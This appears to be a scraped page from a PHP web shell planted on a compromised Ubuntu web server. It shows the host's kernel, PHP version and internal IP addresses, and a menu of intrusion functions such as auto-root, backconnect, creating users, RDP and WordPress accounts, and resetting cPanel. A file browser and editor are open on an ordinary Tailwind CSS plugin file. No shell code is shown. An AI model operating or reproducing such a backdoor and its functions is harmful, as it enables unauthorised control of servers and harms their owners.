Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
tailwindcss /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
postcss-plugins
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
util
[ DIR ]
drwxr-xr-x
value-parser
[ DIR ]
drwxr-xr-x
cli-peer-dependencies.js
274
B
-rw-r--r--
cli.js
61
B
-rw-r--r--
corePluginList.js
2.52
KB
-rw-r--r--
corePlugins.js
90.34
KB
-rw-r--r--
featureFlags.js
1.65
KB
-rw-r--r--
index.js
37
B
-rw-r--r--
plugin.js
1.33
KB
-rw-r--r--
processTailwindFeatures.js
2.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plugin.js
import setupTrackingContext from './lib/setupTrackingContext' import processTailwindFeatures from './processTailwindFeatures' import { env } from './lib/sharedState' import { findAtConfigPath } from './lib/findAtConfigPath' module.exports = function tailwindcss(configOrPath) { return { postcssPlugin: 'tailwindcss', plugins: [ env.DEBUG && function (root) { console.log('\n') console.time('JIT TOTAL') return root }, async function (root, result) { // Use the path for the `@config` directive if it exists, otherwise use the // path for the file being processed configOrPath = findAtConfigPath(root, result) ?? configOrPath let context = setupTrackingContext(configOrPath) if (root.type === 'document') { let roots = root.nodes.filter((node) => node.type === 'root') for (const root of roots) { if (root.type === 'root') { await processTailwindFeatures(context)(root, result) } } return } await processTailwindFeatures(context)(root, result) }, env.DEBUG && function (root) { console.timeEnd('JIT TOTAL') console.log('\n') return root }, ].filter(Boolean), } } module.exports.postcss = true
Close